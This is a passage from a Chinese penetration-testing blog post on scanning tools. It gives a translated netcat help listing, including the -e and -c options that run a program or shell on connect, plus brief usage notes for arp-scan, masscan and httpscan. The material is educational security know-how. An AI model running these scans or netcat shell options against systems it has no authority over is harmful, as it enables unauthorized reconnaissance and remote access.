<p>教程再好终归不如官方文档</p>
</blockquote>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>└─<span class="token comment"># nc -h                 </span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token punctuation">[</span>v1.10-47<span class="token punctuation">]</span></pre></td></tr><tr><td data-num="3"></td><td><pre>连接:   <span class="token function">nc</span> <span class="token punctuation">[</span>-options<span class="token punctuation">]</span> <span class="token function">hostname</span> port<span class="token punctuation">[</span>s<span class="token punctuation">]</span> <span class="token punctuation">[</span>ports<span class="token punctuation">]</span> <span class="token punctuation">..</span>. </pre></td></tr><tr><td data-num="4"></td><td><pre>监听入站:     <span class="token function">nc</span> <span class="token parameter variable">-l</span> <span class="token parameter variable">-p</span> port <span class="token punctuation">[</span>-options<span class="token punctuation">]</span> <span class="token punctuation">[</span>hostname<span class="token punctuation">]</span> <span class="token punctuation">[</span>port<span class="token punctuation">]</span></pre></td></tr><tr><td data-num="5"></td><td><pre>options:</pre></td></tr><tr><td data-num="6"></td><td><pre>        <span class="token parameter variable">-c</span> shell commands       命令为“-e”；prog 程序重定向，使用 /bin/sh 执行 <span class="token punctuation">[</span>危险！！<span class="token punctuation">]</span></pre></td></tr><tr><td data-num="7"></td><td><pre>        <span class="token parameter variable">-e</span> filename             连接后执行的程序<span class="token punctuation">[</span>危险！！<span class="token punctuation">]</span></pre></td></tr><tr><td data-num="8"></td><td><pre>        <span class="token parameter variable">-b</span>                      允许广播</pre></td></tr><tr><td data-num="9"></td><td><pre>        <span class="token parameter variable">-g</span> gateway              网关源路由跳跃点，最多 <span class="token number">8</span> 个</pre></td></tr><tr><td data-num="10"></td><td><pre>        <span class="token parameter variable">-G</span> num                  源路由指针：4, <span class="token number">8</span>, <span class="token number">12</span>, <span class="token punctuation">..</span>.</pre></td></tr><tr><td data-num="11"></td><td><pre>        <span class="token parameter variable">-h</span>                      this cruft  这个废话,就是帮助</pre></td></tr><tr><td data-num="12"></td><td><pre>        <span class="token parameter variable">-i</span> secs                 发送线路、扫描端口的延迟间隔</pre></td></tr><tr><td data-num="13"></td><td><pre>        <span class="token parameter variable">-k</span>                      设置套接字上的 keepalive 选项</pre></td></tr><tr><td data-num="14"></td><td><pre>        <span class="token parameter variable">-l</span>                      监听模式，用于入站连接</pre></td></tr><tr><td data-num="15"></td><td><pre>        <span class="token parameter variable">-n</span>                      仅数字 IP 地址，无 DNS</pre></td></tr><tr><td data-num="16"></td><td><pre>        <span class="token parameter variable">-o</span> <span class="token function">file</span>                 文件十六进制转储流量</pre></td></tr><tr><td data-num="17"></td><td><pre>        <span class="token parameter variable">-p</span> port                 本地端口号</pre></td></tr><tr><td data-num="18"></td><td><pre>        <span class="token parameter variable">-r</span>                      随机化本地和远程端口</pre></td></tr><tr><td data-num="19"></td><td><pre>        <span class="token parameter variable">-q</span> secs                 在 stdin 上的 EOF 和延迟秒后退出</pre></td></tr><tr><td data-num="20"></td><td><pre>        <span class="token parameter variable">-s</span> addr                 本地源地址</pre></td></tr><tr><td data-num="21"></td><td><pre>        <span class="token parameter variable">-T</span> tos                  设置服务类型</pre></td></tr><tr><td data-num="22"></td><td><pre>        <span class="token parameter variable">-t</span>                      应答TELNET协商</pre></td></tr><tr><td data-num="23"></td><td><pre>        <span class="token parameter variable">-u</span>                      UDP模式</pre></td></tr><tr><td data-num="24"></td><td><pre>        <span class="token parameter variable">-v</span>                      verbose <span class="token punctuation">[</span>使用两次以更加详细<span class="token punctuation">]</span></pre></td></tr><tr><td data-num="25"></td><td><pre>        <span class="token parameter variable">-w</span> secs                 连接和最终网络读取的超时时间</pre></td></tr><tr><td data-num="26"></td><td><pre>        <span class="token parameter variable">-C</span>                      发送 CRLF 作为行结束符</pre></td></tr><tr><td data-num="27"></td><td><pre>        <span class="token parameter variable">-z</span>                      零 I/O 模式 <span class="token punctuation">[</span>用于扫描<span class="token punctuation">]</span></pre></td></tr><tr><td data-num="28"></td><td><pre>port numbers can be individual or ranges: lo-hi <span class="token punctuation">[</span>inclusive<span class="token punctuation">]</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="29"></td><td><pre>hyphens <span class="token keyword">in</span> port names must be backslash escaped <span class="token punctuation">(</span>e.g. <span class="token string">'ftp\-data'</span><span class="token punctuation">)</span>.</pre></td></tr><tr><td data-num="30"></td><td><pre><span class="token comment"># 端口号可以是单个端口号，也可以是范围：lo-hi [包含]；</span></pre></td></tr><tr><td data-num="31"></td><td><pre><span class="token comment"># 端口名称中的连字符必须使用反斜杠转义（例如 “ftp\-data”）。</span></pre></td></tr></tbody></table></figure><h1 id="后话"><a class="anchor" href="#后话">#</a> 后话</h1>
<p>nc、netcat、nmap……kali 还有多少不可估量的工具等着自己发掘</p>
<h2 id="题外话1arp-scan"><a class="anchor" href="#题外话1arp-scan">#</a> 题外话 1：<a target="_blank" rel="noopener external nofollow noreferrer" href="https://gitcode.com/royhills/arp-scan?utm_source=artical_gitcode">arp-scan</a></h2>
<p><strong>什么是 ARP</strong><br>
 地址解析协议（Address Resolution Protocol），其基本功能为通过目标设备的 IP 地址，查询目标设备的 MAC 地址，以保证通信的顺利进行。 它是 IPv4 中网络层必不可少的协议，是根据 IP 地址获得物理地址 MAC 的一个 TCP/IP 协议。通过 ARP，在局域网可以很容易构成一个 ARP 欺骗，从而得到有用数据信息。</p>
<table>
<thead>
<tr>
<th>参数</th>
<th>作业</th>
</tr>
</thead>
<tbody>
<tr>
<td>-v</td>
<td>显示详细的进度消息</td>
</tr>
<tr>
<td>-V</td>
<td>显示版本</td>
</tr>
<tr>
<td>-i</td>
<td>使用网络接口</td>
</tr>
<tr>
<td>-f</td>
<td>从文件中读取主机名或地址</td>
</tr>
<tr>
<td>-I</td>
<td>从接口地址和网络掩码（包括网络和广播）生成列表</td>
</tr>
</tbody>
</table>
<p>常用</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>arp-scan <span class="token parameter variable">--localnet</span>   <span class="token comment"># 发送 ARP 请求扫描本地网络中的活动主机，并显示它们的 MAC 地址和 IP 地址。</span></pre></td></tr><tr><td data-num="2"></td><td><pre>arp-scan <span class="token parameter variable">-I</span> eth0 <span class="token parameter variable">--rtt</span> <span class="token operator">&lt;</span>ip<span class="token operator">&gt;</span>  <span class="token comment"># 在指定网络接口（例如 eth0）上执行 ARP 扫描，同时显示每个主机的往返时间（RTT）</span></pre></td></tr></tbody></table></figure><p><a target="_blank" rel="noopener external nofollow noreferrer" href="https://cn.linuxos.info/command/arp-scan">arp-scan - 参考手册、选项、命令示例 (linuxos.info)</a></p>
<h2 id="题外话2masscan"><a class="anchor" href="#题外话2masscan">#</a> 题外话 2：<a target="_blank" rel="noopener external nofollow noreferrer" href="http://t.csdnimg.cn/2uU8h">Masscan</a></h2>
<blockquote>
<p>Masscan 是一款快速、高性能的开源端口扫描工具，旨在以极高的速度扫描整个互联网的 IPv4 地址空间。它的设计目标是快速、灵活且适用于大规模的端口扫描任务。</p>
</blockquote>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>masscan <span class="token operator">&lt;</span>IP或网段<span class="token operator">&gt;</span> <span class="token parameter variable">-p</span> <span class="token operator">&lt;</span>端口号或端口范围<span class="token operator">&gt;</span> <span class="token parameter variable">--rate</span> <span class="token operator">&lt;</span>每秒发送数据包数量<span class="token operator">&gt;</span>（一般十万或一百万）</pre></td></tr></tbody></table></figure><p>其他参数详解：</p>
<table>
<thead>
<tr>
<th>选项</th>
<th>作用</th>
</tr>
</thead>
<tbody>
<tr>
<td>--excludefile filename</td>
<td>排除文件中的选项</td>
</tr>
<tr>
<td>-oX filename</td>
<td>输出到 filename 的 XML</td>
</tr>
<tr>
<td>-oG filename</td>
<td>输出到 filename 在的 grepable 格式</td>
</tr>
<tr>
<td>-oJ filename</td>
<td>输出到 filename 在 JSON 格式。</td>
</tr>
</tbody>
</table>
<p>主打一个快捷迅速</p>
<h2 id="题外话3httpscan"><a class="anchor" href="#题外话3httpscan">#</a> 题外话 3：<a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/zer0h/httpscan">httpscan</a></h2>
<p><a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/zer0h/httpscan">项目地址</a></p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>httpscan.py <span class="token number">192.168</span>.0.0/24 –t <span class="token number">10</span></pre></td></tr></tbody></table></figure><blockquote>
<p>httpscan 是一个扫描指定 CIDR 网段的 Web 主机的小工具。和端口扫描器不一样，httpscan 是以爬虫的方式进行 Web 主机发现，因此相对来说不容易被防火墙拦截。</p>
</blockquote>
<h1 id="参考链接"><a class="anchor" href="#参考链接">#</a> 参考链接：</h1>
<p><a target="_blank" rel="noopener external nofollow noreferrer" href="https://nmap.org/man/zh/index.html">官方文档：</a><a target="_blank" rel="noopener external nofollow noreferrer" href="https://nmap.org/man/zh/index.html">https://nmap.org/man/zh/index.html</a></p>
<p><a target="_blank" rel="noopener external nofollow noreferrer" href="http://t.csdnimg.cn/iN9Wc">http://t.csdnimg.cn/iN9Wc</a></p>
<p><a target="_blank" rel="noopener external nofollow noreferrer" href="http://t.csdnimg.cn/2uU8h">http://t.csdnimg.cn/2uU8h</a></p>
<p><a target="_blank" rel="noopener external nofollow noreferrer" href="https://gitcode.com/royhills/arp-scan?utm_source=artical_gitcode">https://gitcode.com/royhills/arp-scan</a></p>
<div class="tags"><a href="/tags/Attack-and-Defence/" rel="tag"><i class="ic i-tag"></i>Attack and Defence</a><a href="/tags/kali-tools/" rel="tag"><i class="ic i-tag"></i>kali tools</a><a href="/tags/Penetration-Test/" rel="tag"><i class="ic i-tag"></i>Penetration Test</a></div></div><footer><div class="meta"><span class="icon"><i class="ic i-eye"></i></span><span>此文章已被阅读次数:</span><span class="waline-pageview-count" id="twikoo_visitors" data-path="post/扫描不止-nc-nmap/">正在加载...</span><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">更新于</span><time title="修改时间：2024-04-19 20:21:32" itemprop="dateModified" datetime="2024-04-19T20:21:32+08:00">2024-04-19</time></span></div><div class="reward"><button><i class="ic i-heartbeat"></i>赞赏</button><p>请我喝[茶]~(￣▽￣)~*</p><div id="qr"><div><img loading="lazy" data-src="/assets/wechatpay.webp" alt="MorIo24 微信支付"><p>微信支付</p></div><div><img loading="lazy" data-src="/assets/alipay.webp" alt="MorIo24 支付宝"><p>支付宝</p></div></div></div><div id="copyright"><ul><li class="author"><strong>本文作者：</strong>MorIo24<i class="ic i-at"><em>@</em></i>Glad to see U (◦˙▽˙◦)</li><li class="link"><strong>本文链接：</strong><a href="https://ctf-learner.github.io/post/%E6%89%AB%E6%8F%8F%E4%B8%8D%E6%AD%A2-nc-nmap/" title="扫描不止 nc&amp;nmap">https://ctf-learner.github.io/post/扫描不止-nc-nmap/</a></li><li class="license"><strong>版权声明：</strong>本站所有文章除特别声明外，均采用 <a target="_blank" rel="noopener external nofollow noreferrer" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/post/AWD%E5%88%9D%E4%BD%93%E9%AA%8C/" rel="prev" itemprop="url" data-background-image="https://s2.loli.net/2024/04/15/S8G49Lx6DB5tUqQ.webp" title="AWD初体验"><span class="type">上一篇</span><span class="category"><i class="ic i-flag"></i>AWD</span><h3>AWD初体验</h3></a></div><div class="item right"><a href="/post/%E4%B8%8D%E4%BC%9A%E5%B0%B1%E6%90%9Csearchsploit/" rel="next" itemprop="url" data-background-image="https://s2.loli.net/2024/04/15/Lw1vm6pWQsDaT72.webp" title="不会就搜searchsploit"><span class="type">下一篇</span><span class="category"><i class="ic i-flag"></i>Penetration Test</span><h3>不会就搜searchsploit</h3></a></div></div><div class="wrap" id="comments"></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#namp"><span class="toc-number">1.</span> <span class="toc-text"> namp</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%AE%E6%A0%87%E8%AF%B4%E6%98%8E"><span class="toc-number">1.1.</span> <span class="toc-text"> 目标说明</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="toc-number">1.2.</span> <span class="toc-text"> 主机发现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">1.3.</span> <span class="toc-text"> 端口扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#-a%E9%80%89%E9%A1%B9%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="toc-number">1.4.</span> <span class="toc-text"> -A 选项的使用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BE%93%E5%87%BA%E6%A0%BC%E5%BC%8F"><span class="toc-number">1.5.</span> <span class="toc-text"> 输出格式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E5%AE%9E%E4%BE%8B"><span class="toc-number">1.6.</span> <span class="toc-text"> 常用实例</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#nc%E5%9F%BA%E7%A1%80%E4%BD%BF%E7%94%A8"><span class="toc-number">2.</span> <span class="toc-text"> nc 基础使用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BC%A0%E9%80%81exp"><span class="toc-number">2.1.</span> <span class="toc-text"> 传送 exp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%A5%E5%BF%97%E6%89%93%E5%8D%B0"><span class="toc-number">2.2.</span> <span class="toc-text"> 日志打印</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#nc%E5%91%BD%E4%BB%A4%E8%BF%9B%E9%98%B6%E4%BD%BF%E7%94%A8"><span class="toc-number">3.</span> <span class="toc-text"> nc 命令进阶使用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%9B%E9%80%A0%E5%90%8E%E9%97%A8"><span class="toc-number">3.1.</span> <span class="toc-text"> 创造后门</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%89%AB%E6%8F%8F%E7%AB%AF%E5%8F%A3"><span class="toc-number">3.2.</span> <span class="toc-text"> 扫描端口</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%8D%E5%90%91%E8%BF%9E%E6%8E%A5%E5%BC%B9shell"><span class="toc-number">3.3.</span> <span class="toc-text"> 反向连接弹 shell</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%AE%9E%E6%88%98%E4%B8%80%E4%B8%8B"><span class="toc-number">4.</span> <span class="toc-text"> 实战一下</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%8C%E6%95%B4%E4%BD%BF%E7%94%A8%E8%AF%B4%E6%98%8E"><span class="toc-number">4.0.1.</span> <span class="toc-text"> 完整使用说明</span></a></li></ol></li></ol><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%90%8E%E8%AF%9D"><span class="toc-number">5.</span> <span class="toc-text"> 后话</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E5%A4%96%E8%AF%9D1arp-scan"><span class="toc-number">5.1.</span> <span class="toc-text"> 题外话 1：arp-scan</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E5%A4%96%E8%AF%9D2masscan"><span class="toc-number">5.2.</span> <span class="toc-text"> 题外话 2：Masscan</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E5%A4%96%E8%AF%9D3httpscan"><span class="toc-number">5.3.</span> <span class="toc-text"> 题外话 3：httpscan</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-number">6.</span> <span class="toc-text"> 参考链接：</span></a></li></div><div class="related panel pjax" data-title="系列文章"><ul><li class="active"><a href="/post/%E6%89%AB%E6%8F%8F%E4%B8%8D%E6%AD%A2-nc-nmap/" rel="bookmark" title="扫描不止 nc&amp;nmap">扫描不止 nc&amp;nmap</a></li><li><a href="/post/%E4%B8%8D%E4%BC%9A%E5%B0%B1%E6%90%9Csearchsploit/" rel="bookmark" title="不会就搜searchsploit">不会就搜searchsploit</a></li><li><a href="/post/MSF-%E4%B8%87%E5%8D%83waf%E4%B8%AD%E5%8F%96ROOT%E9%A6%96%E7%BA%A7/" rel="bookmark" title="MSF---万千waf中取ROOT首级">MSF---万千waf中取ROOT首级</a></li><li><a href="/post/Get-Earth-Shell/" rel="bookmark" title="Get Earth Shell">Get Earth Shell</a></li></ul></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" loading="lazy" decoding="async" itemprop="image" alt="MorIo24" src="/assets/avatar.webp"><p class="name" itemprop="name">MorIo24</p><div class="description" itemprop="description">Never hack for profit</div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">7</span><span class="name">文章</span></a></div><div class="item categories"><a href="/categories/"><span class="count">3</span><span class="name">分类</span></a></div><div class="item tags"><a href="/tags/"><span class="count">5</span><span class="name">标签</span></a></div></nav><div class="social"><a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/ctf-learner" class="item github" title="https://github.com/ctf-learner"><i class="ic i-github"></i></a><a target="_blank" rel="noopener external nofollow noreferrer" href="https://gitee.com/morio24" class="item gitee" title="https://gitee.com/morio24"><i class="ic i-gitee"></i></a><a href="gmail:morio24@qq.com" rel="external nofollow noreferrer" class="item email" title="gmail:morio24@qq.com"><i class="ic i-envelope"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item"><a href="/about/me" rel="section"><i class="ic i-user"></i>关于</a></li><li class="item dropdown"><a href="#" onclick="return false;"><i class="ic i-feather"></i>文章</a><ul class="submenu"><li class="item"><a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a></li></ul></li><li class="item"><a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a></li><li class="item"><a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a></li><li class="item"><a href="/friends/" rel="section"><i class="ic i-coffee"></i>友链</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"><a href="/post/%E4%B8%8D%E4%BC%9A%E5%B0%B1%E6%90%9Csearchsploit/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/post/AWD%E5%88%9D%E4%BD%93%E9%AA%8C/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"><a href="/categories/AWD/" title="分类于AWD">AWD</a></div><span><a href="/post/AWD-waf%E8%84%9A%E6%9C%AC/">AWD-waf脚本</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Penetration-Test/" title="分类于Penetration Test">Penetration Test</a></div><span><a href="/post/Get-Earth-Shell/">Get Earth Shell</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Penetration-Test/" title="分类于Penetration Test">Penetration Test</a></div><span><a href="/post/MSF-%E4%B8%87%E5%8D%83waf%E4%B8%AD%E5%8F%96ROOT%E9%A6%96%E7%BA%A7/">MSF---万千waf中取ROOT首级</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Penetration-Test/" title="分类于Penetration Test">Penetration Test</a></div><span><a href="/post/%E6%89%AB%E6%8F%8F%E4%B8%8D%E6%AD%A2-nc-nmap/">扫描不止 nc&amp;nmap</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Penetration-Test/" title="分类于Penetration Test">Penetration Test</a></div><span><a href="/post/%E4%B8%8D%E4%BC%9A%E5%B0%B1%E6%90%9Csearchsploit/">不会就搜searchsploit</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/AWD/" title="分类于AWD">AWD</a></div><span><a href="/post/AWD%E5%88%9D%E4%BD%93%E9%AA%8C/">AWD初体验</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E5%85%B3%E4%BA%8EshokaX/" title="分类于关于shokaX">关于shokaX</a></div><span><a href="/post/%E6%90%AD%E5%8D%9A%E5%AE%A2%E4%B8%80%E8%B7%AF%E7%9A%84%E5%BF%83%E9%85%B8/">搭博客一路的心酸</a></span></li></ul></div></div><div class="status"><div class="copyright">© 追风赶月莫停留，平芜尽处是春山 -<span itemprop="copyrightYear">2024</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">MorIo24 @ MorIo24's blog</span></div><div class="count"><div class="time-last"><span id="timeDate">载入天数...</span><span id="times">载入时分秒...</span><script>var now = new Date();
function createtime() {
    var grt= new Date("4/16/2024 13:14:20");
    now.setTime(now.getTime()+250);
    days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days);
    hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours);
    if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
    mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;}
    seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
    snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;}
    document.getElementById("timeDate").innerHTML = "小破站在风雨中孤苦伶仃度过了 "+dnum+" 天 ";
    document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒";
}
setInterval("createtime()",250);</script></div><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="站点总字数">69k 字</span><span class="post-meta-divider"> | </span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="站点阅读时长">1:03</span></div><div class="powered-by">基于 <a target="_blank" rel="noopener external nofollow noreferrer" href="https://hexo.io/">Hexo</a> &amp; Theme.<a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/theme-shoka-x/hexo-theme-shokaX/">ShokaX</a></div><script src="/live2d-widget/autoload.js"></script></div></div></footer></div><script data-config="" type="text/javascript">var LOCAL = {
    ispost: true,
        path: `post/扫描不止-nc-nmap/`,
        favicon: {
        show: `好久不见~(ღ˘⌣˘ღ)~`,
        hide: `404咯(｡í _ ì｡)`
    },
    search: {
        placeholder: "文章搜索",
        empty: "关于 「 ${query} 」，什么也没搜到",
        stats: "${time} ms 内找到 ${hits} 条结果"
    },
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    fancybox: true,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">文章时效性提示</span><br>这是一篇发布于 {{publish}} 天前，最后一次更新在 {{updated}} 天前的文章，部分信息可能已经发生改变，请注意甄别。</p></div>`,
    quiz: {
        choice: `单选题`,
        multiple: `多选题`,
        true_false: `判断题`,
        essay: `问答题`,
        gap_fill: `填空题`,
        mistake: `错题备注`
    },
    ignores: [
        (uri) => uri.includes('#'),
        (uri) => new RegExp(LOCAL.path + '$').test(uri),
            []
    ]
};
</script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/pace/1.2.4/pace.min.js" async=""></script><script src="/js/siteInit.js?v=0.4.2" type="module" fetchpriority="high" defer=""></script></body></html>